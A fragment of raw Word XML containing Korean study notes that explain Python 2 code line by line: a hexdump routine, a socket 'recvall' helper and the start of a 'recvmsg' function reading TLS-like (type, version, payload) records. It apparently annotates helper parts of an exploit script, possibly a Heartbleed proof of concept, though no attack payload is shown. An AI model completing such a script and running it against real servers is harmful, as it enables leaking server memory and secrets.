          <w:p w14:paraId="4591B207" w14:textId="4A93751D" w:rsidR="005C2758" w:rsidRPr="005C2758" w:rsidRDefault="005C2758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 w:rsidRPr="005C2758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</w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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      # 2</w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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자리수 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C2758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헥사값으로</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005C2758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한 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C2758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칸씩</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005C2758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공백을 두어 문자열 변수 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C2758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hxdat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005C2758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에 저장</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2976E370" w14:textId="1600BC12" w:rsid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hxdat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= ' </w:t>
            </w:r>
            <w:proofErr w:type="gram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'.join</w:t>
            </w:r>
            <w:proofErr w:type="gram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('%02X' % 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ord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(c) for c in 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lin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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="353BAC8C" w14:textId="4D573E91" w:rsidR="005C2758" w:rsidRDefault="005C2758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</w:p>
          <w:p w14:paraId="270813FF" w14:textId="14A31F5E" w:rsidR="005C2758" w:rsidRPr="005C2758" w:rsidRDefault="005C2758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 w:rsidRPr="005C2758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</w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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      # </w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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리스트 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C2758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lin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005C2758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</w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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값을 차례대로 </w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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c</w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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에 넣은 뒤 </w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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c</w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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의 아스키 값이 </w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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32~126 </w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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사이라면 </w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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c</w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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를</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50F713AB" w14:textId="12AADDD8" w:rsidR="005C2758" w:rsidRPr="005C2758" w:rsidRDefault="005C2758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 w:rsidRPr="005C2758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</w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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      # </w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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아니라면 점</w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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‘.’</w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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을 공백 없이 순서대로 나열하여 문자열 변수 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C2758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pdat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005C2758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에 저장</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50FFFD47" w14:textId="400D6CDA" w:rsid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pdat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= '</w:t>
            </w:r>
            <w:proofErr w:type="gram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'.join</w:t>
            </w:r>
            <w:proofErr w:type="gram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((c if 32 &lt;= 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ord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(c) &lt;= 126 else '.' )for c in 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lin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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E15C8AD" w14:textId="04C07AC1" w:rsidR="005C2758" w:rsidRDefault="005C2758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</w:p>
          <w:p w14:paraId="6731F2C9" w14:textId="16D5D46D" w:rsidR="005C2758" w:rsidRPr="0044398A" w:rsidRDefault="005C2758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 w:rsidRPr="0044398A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</w:t>
            </w:r>
            <w:r w:rsidRPr="0044398A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      </w:t>
            </w:r>
            <w:r w:rsidR="0044398A" w:rsidRPr="0044398A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# </w:t>
            </w:r>
            <w:r w:rsidR="0044398A" w:rsidRPr="0044398A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b</w:t>
            </w:r>
            <w:r w:rsidR="0044398A" w:rsidRPr="0044398A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, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0044398A" w:rsidRPr="0044398A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hxdat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0044398A" w:rsidRPr="0044398A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, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0044398A" w:rsidRPr="0044398A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pdat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0044398A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변수를</w:t>
            </w:r>
            <w:r w:rsidR="0044398A" w:rsidRPr="0044398A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해당 형식으로 출력한다</w:t>
            </w:r>
            <w:r w:rsidR="004837AA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.</w:t>
            </w:r>
            <w:r w:rsidR="004837AA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python 2</w:t>
            </w:r>
            <w:r w:rsidR="004837AA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버전이라 괄호 없음</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07A47279" w14:textId="244313F8" w:rsid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    print </w:t>
            </w:r>
            <w:proofErr w:type="gram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'  %</w:t>
            </w:r>
            <w:proofErr w:type="gram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04x: %-48s %s' % (b, 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hxdat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pdat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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CC18448" w14:textId="77777777" w:rsidR="004837AA" w:rsidRDefault="004837AA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 w:rsidRPr="004837AA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</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C61D7AD" w14:textId="657C7868" w:rsidR="004837AA" w:rsidRPr="004837AA" w:rsidRDefault="004837AA" w:rsidP="004837A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200" w:firstLine="480"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 w:rsidRPr="004837AA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# </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004837AA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줄바꿈</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004837AA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</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004837AA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역할</w:t>
            </w:r>
            <w:r w:rsidR="0011429B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</w:t>
            </w:r>
            <w:r w:rsidR="0011429B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:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="0011429B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print() //</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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p</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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ython 2</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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버전이라 괄호</w:t>
            </w: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</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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없음</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AC85217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print</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20234263" w14:textId="77777777" w:rsidR="00F66A96" w:rsidRPr="008A727E" w:rsidRDefault="00F66A96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</w:p>
          <w:p w14:paraId="4F58BAE9" w14:textId="25995B2D" w:rsidR="00062BD9" w:rsidRDefault="00062BD9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>
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r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25314CCE" w14:textId="00AB86A3" w:rsid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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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recvall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s, length, timeout=5):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01327007" w14:textId="5B7D9938" w:rsidR="004837AA" w:rsidRPr="004837AA" w:rsidRDefault="00F66A96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 w:rsidRPr="004837AA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</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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  # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004837AA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e</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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ndtime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="004837AA" w:rsidRPr="004837AA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에</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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</w:t>
            </w:r>
            <w:r w:rsidR="004837AA" w:rsidRPr="004837AA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time</w:t>
            </w:r>
            <w:r w:rsidR="004837AA" w:rsidRPr="004837AA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모듈의 </w:t>
            </w:r>
            <w:r w:rsidR="004837AA" w:rsidRPr="004837AA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time</w:t>
            </w:r>
            <w:r w:rsidR="004837AA" w:rsidRPr="004837AA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함수(</w:t>
            </w:r>
            <w:r w:rsidR="004837AA" w:rsidRPr="004837AA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1970.1.1</w:t>
            </w:r>
            <w:r w:rsidR="004837AA" w:rsidRPr="004837AA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기준 경과 시간(초)</w:t>
            </w:r>
            <w:r w:rsidR="004837AA" w:rsidRPr="004837AA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) + 5</w:t>
            </w:r>
            <w:r w:rsidR="004837AA" w:rsidRPr="004837AA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를 더한 값 저장</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F5C3342" w14:textId="7C6BF2E0" w:rsid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endtime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time.time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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) + timeout</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54516D0A" w14:textId="6128DC74" w:rsidR="004837AA" w:rsidRPr="004837AA" w:rsidRDefault="004837AA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 w:rsidRPr="004837AA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</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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  # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004837AA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rdata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004837AA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초기화</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F275334" w14:textId="779E35D7" w:rsid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rdata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= ''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B8461EF" w14:textId="591C14DF" w:rsidR="004837AA" w:rsidRPr="004837AA" w:rsidRDefault="004837AA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 w:rsidRPr="004837AA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lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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  # remain</w:t>
            </w:r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변수</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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에</w:t>
            </w:r>
            <w:r w:rsidR="005D336C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함수 호출될 때</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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입력 받은 </w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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length</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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값 저장</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62AFBED7" w14:textId="78DEDE74" w:rsid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remain = length</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F0DC6BA" w14:textId="77777777" w:rsidR="004837AA" w:rsidRDefault="004837AA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</w:p>
          <w:p w14:paraId="190910F6" w14:textId="2DCF9181" w:rsidR="004837AA" w:rsidRPr="004837AA" w:rsidRDefault="004837AA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 w:rsidRPr="004837AA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</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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# </w:t>
            </w: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만약 </w:t>
            </w:r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remain </w:t>
            </w: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변수가 </w:t>
            </w:r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0</w:t>
            </w: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보다 크다면 반복</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B392CDA" w14:textId="35F77685" w:rsid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while remain &gt; 0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="718A91D9" w14:textId="62D61770" w:rsidR="004837AA" w:rsidRPr="004837AA" w:rsidRDefault="004837AA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 w:rsidRPr="004837AA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</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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      # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004837AA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rtime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004837AA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에 </w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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(</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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상단에서 저장한 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004837AA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endtime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004837AA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값 </w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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– </w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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실시간으로 변하는 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004837AA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time.time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004837AA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() </w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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값) 저장</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B7A6C81" w14:textId="4A4E150E" w:rsid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rtime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endtime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- </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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time.time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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() </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="308A8D1C" w14:textId="4AA5C2FA" w:rsidR="004837AA" w:rsidRPr="004837AA" w:rsidRDefault="004837AA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 w:rsidRPr="004837AA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</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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      # </w:t>
            </w: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만약 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004837AA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rtime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004837AA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값이 </w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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0</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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보다 작다면</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12A16B61" w14:textId="14CB3567" w:rsid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    if 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rtime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&lt; 0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52CC6D1C" w14:textId="0A1D99FF" w:rsidR="004837AA" w:rsidRPr="008A727E" w:rsidRDefault="004837AA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4837AA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</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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          # None</w:t>
            </w:r>
            <w:r w:rsidRPr="004837AA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반환</w:t>
            </w:r>
            <w:r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55A12BE6" w14:textId="5E0B3650" w:rsid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        return None</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F2F94AB" w14:textId="77777777" w:rsidR="00F05598" w:rsidRDefault="00F05598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</w:p>
          <w:p w14:paraId="7D13F1FD" w14:textId="7324021D" w:rsidR="004837AA" w:rsidRPr="00F05598" w:rsidRDefault="004837AA" w:rsidP="00F055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 w:rsidRPr="00F05598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</w:t>
            </w:r>
            <w:r w:rsidRPr="00F05598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      # select</w:t>
            </w:r>
            <w:r w:rsidRPr="00F05598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모듈의 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F05598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select </w:t>
            </w:r>
            <w:r w:rsidRPr="00F05598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함</w:t>
            </w:r>
            <w:r w:rsidR="00F05598" w:rsidRPr="00F05598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수에 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F05598" w:rsidRPr="00F05598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rlist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F05598" w:rsidRPr="00F05598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, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F05598" w:rsidRPr="00F05598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wlist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F05598" w:rsidRPr="00F05598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, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F05598" w:rsidRPr="00F05598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xlist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F05598" w:rsidRPr="00F05598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값과 </w:t>
            </w:r>
            <w:r w:rsidR="00F05598" w:rsidRPr="00F05598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timeout </w:t>
            </w:r>
            <w:r w:rsidR="00F05598" w:rsidRPr="00F05598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값을 입력한</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="136D25AC" w14:textId="1F60E2D1" w:rsidR="00F05598" w:rsidRPr="00F05598" w:rsidRDefault="00F05598" w:rsidP="00F055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 w:rsidRPr="00F05598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</w:t>
            </w:r>
            <w:r w:rsidRPr="00F05598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      # </w:t>
            </w:r>
            <w:r w:rsidRPr="00F05598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결과값을 각각 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F05598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r, w, e </w:t>
            </w:r>
            <w:r w:rsidRPr="00F05598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변수에 저장</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62EA25FE" w14:textId="6AEE965C" w:rsidR="00F05598" w:rsidRPr="00F05598" w:rsidRDefault="00F05598" w:rsidP="00F055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 w:rsidRPr="00F05598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</w:t>
            </w:r>
            <w:r w:rsidRPr="00F05598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      # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F05598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rlist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F05598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: 읽기 대기,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F05598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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F05598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wlist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F05598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: 쓰기 대기,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F05598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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F05598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xlist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F05598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: 예외조건 대기,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F05598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timeout: </w:t>
            </w:r>
            <w:r w:rsidRPr="00F05598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시간제한</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="231DF138" w14:textId="0F675CC2" w:rsid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    r, w, e = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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select.select</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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[s], [], [], 5)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C7688C7" w14:textId="77777777" w:rsidR="00F37C5F" w:rsidRDefault="00F37C5F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</w:p>
          <w:p w14:paraId="0B5E430A" w14:textId="55782028" w:rsidR="00F05598" w:rsidRPr="00F37C5F" w:rsidRDefault="00F05598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 w:rsidRPr="00F37C5F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</w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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      # s</w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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값이 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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r</w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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리스트 값 중 하나라면</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EBBC2F1" w14:textId="23560FB8" w:rsid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    if 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s in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r:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37A5DA37" w14:textId="3AD639E0" w:rsidR="00F05598" w:rsidRPr="00F37C5F" w:rsidRDefault="00F05598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 w:rsidRPr="00F37C5F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</w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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          # data </w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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변수에 연결된 </w:t>
            </w:r>
            <w:r w:rsidR="00F37C5F" w:rsidRPr="00F37C5F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s </w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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소켓으로부터 받아</w:t>
            </w:r>
            <w:r w:rsidR="00F37C5F" w:rsidRPr="00F37C5F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온 </w:t>
            </w:r>
            <w:r w:rsidR="00F37C5F" w:rsidRPr="00F37C5F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remain </w:t>
            </w:r>
            <w:r w:rsidR="00F37C5F" w:rsidRPr="00F37C5F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데이터를 저장한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="143269FA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        data = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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s.recv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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remain)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D1847CD" w14:textId="224BEAB7" w:rsidR="008A727E" w:rsidRPr="00F37C5F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 w:rsidRPr="00F37C5F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           #</w:t>
            </w:r>
            <w:r w:rsidR="00F37C5F" w:rsidRPr="00F37C5F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</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00F37C5F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E</w:t>
            </w:r>
            <w:r w:rsidR="00F37C5F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OF :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00F37C5F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</w:t>
            </w:r>
            <w:r w:rsidR="00F37C5F" w:rsidRPr="00F37C5F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data</w:t>
            </w:r>
            <w:r w:rsidR="00F37C5F" w:rsidRPr="00F37C5F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가 없다면 </w:t>
            </w:r>
            <w:r w:rsidR="00F37C5F" w:rsidRPr="00F37C5F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None </w:t>
            </w:r>
            <w:r w:rsidR="00F37C5F" w:rsidRPr="00F37C5F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반환</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57877536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        if not data:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02A88EA2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            return None</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05D4C899" w14:textId="63A00E2F" w:rsidR="00F37C5F" w:rsidRPr="00F37C5F" w:rsidRDefault="00F37C5F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 w:rsidRPr="00F37C5F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</w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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          # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F37C5F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rdata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F37C5F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</w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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변수에 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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data</w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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값을 추가</w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1774938D" w14:textId="6BD8D9C2" w:rsid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        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rdata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+= data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7926E9D9" w14:textId="48D496B4" w:rsidR="00F37C5F" w:rsidRPr="00F37C5F" w:rsidRDefault="00F37C5F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 w:rsidRPr="00F37C5F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</w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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          # remain </w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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변수에 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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data</w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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의 길이만큼 뺀다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E4D52A0" w14:textId="1FD9F82A" w:rsid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        remain -= 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len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data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08123934" w14:textId="2BEE83D3" w:rsidR="00F37C5F" w:rsidRPr="00F37C5F" w:rsidRDefault="00F37C5F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 w:rsidRPr="00F37C5F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</w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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  # </w:t>
            </w:r>
            <w:r w:rsidR="00854462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함수를 종료하며 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F37C5F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rdata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F37C5F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값 </w:t>
            </w:r>
            <w:r w:rsidR="00854462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반환</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2767C321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return 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rdata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="52B59E55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    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C87F873" w14:textId="1A4E4853" w:rsid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</w:p>
          <w:p w14:paraId="4839555E" w14:textId="210CBC96" w:rsidR="005209BC" w:rsidRPr="00062BD9" w:rsidRDefault="005209BC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 w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00062BD9">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00062BD9">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00062BD9">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>recvall</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00062BD9">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00062BD9">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">함수를 이용하여 </w:t>
            </w:r>
            <w:r w:rsidRPr="00062BD9">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00062BD9">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>typ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00062BD9">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="0070C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062BD9">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00062BD9">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>, pay)</w:t>
            </w:r>
            <w:r w:rsidRPr="00062BD9">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>값을</w:t>
            </w:r>
            <w:r w:rsidR="00062BD9">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 조건에 맞게</w:t>
            </w:r>
            <w:r w:rsidRPr="00062BD9">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 출력한 뒤 반환한다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="275317E4" w14:textId="02F00B28" w:rsid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def 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recvmsg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s):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DE8B8CD" w14:textId="3C50BC43" w:rsidR="00F37C5F" w:rsidRPr="00F37C5F" w:rsidRDefault="00F37C5F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 w:rsidRPr="00F37C5F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</w:t>
            </w:r>
